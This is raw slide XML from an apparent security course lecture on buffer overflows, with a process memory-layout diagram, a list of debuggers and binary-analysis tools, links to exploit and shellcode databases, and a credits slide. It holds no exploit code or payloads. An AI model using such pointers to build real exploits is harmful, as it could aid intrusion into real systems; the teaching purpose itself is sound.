            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space -----------------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621000" y="1757700"/>
            <a:ext cx="2944500" cy="4770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697" name="Shape 697"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643375" y="2368975"/>
            <a:ext cx="2922000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4867000" y="1817350"/>
            <a:ext cx="2577600" cy="503700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Shape 699"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4867000" y="2469200"/>
            <a:ext cx="2577600" cy="503700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Shape 700"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815575" y="3005075"/>
            <a:ext cx="2577600" cy="503700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Shape 701"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4867000" y="3731450"/>
            <a:ext cx="2577600" cy="503700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Shape 702"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943200" y="5952325"/>
            <a:ext cx="2577600" cy="503700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Shape 703"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565375" y="5991775"/>
            <a:ext cx="931800" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Shape 704"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7717775" y="1757700"/>
            <a:ext cx="931800" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Low memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="705" name="Shape 705"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635925" y="3002575"/>
            <a:ext cx="2929500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="706" name="Shape 706"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4649725" y="3549050"/>
            <a:ext cx="2901900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="707" name="Shape 707"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613550" y="4940725"/>
            <a:ext cx="2974200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="228600">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="708" name="Shape 708"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275875" y="4120725"/>
            <a:ext cx="15000" cy="588900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="709" name="Shape 709"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6365325" y="5171700"/>
            <a:ext cx="0" cy="849900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320450" y="4211825"/>
            <a:ext cx="0" cy="490500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="711" name="Shape 711"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771025" y="4211825"/>
            <a:ext cx="0" cy="490500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="712" name="Shape 712"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803025" y="4211825"/>
            <a:ext cx="0" cy="490500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5858425" y="5223975"/>
            <a:ext cx="7500" cy="834900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="714" name="Shape 714"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6803025" y="5171700"/>
            <a:ext cx="0" cy="849900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="715" name="Shape 715"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5320450" y="5216475"/>
            <a:ext cx="0" cy="8499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Shape 720"/>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Tools for testing/discovering Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Shape 721"/>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lang="en"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>winDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>OllyDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>IDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>immunityDBG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>gdb, valgrind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>gcc/g++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>vi/vim/emacs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>bash and perl/python/ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>cat / netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>readelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>objdump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>ltrace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>strace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>ROPeme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>We will cover Return Orient Programming attacks next time</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Shape 726"/>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Exploit/Shellcode/Vuln Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Shape 727"/>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indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://www.exploit-db.com/search/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://projectshellcode.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://www.shell-storm.org/shellcode/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://nvd.nist.gov/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://cve.mitre.org/</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1" name="Shape 731"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Shape 732"/>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Credits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Shape 733"/>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lang="en"/>
              <a:t>Many thanks and credit goes to the following for the material on fuzzing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[1] Mitch Adair - UTDallas Computer Security Group.  http://utdcsg.org/csg/</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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>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indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Harvard architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uncommon-&gt;Common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
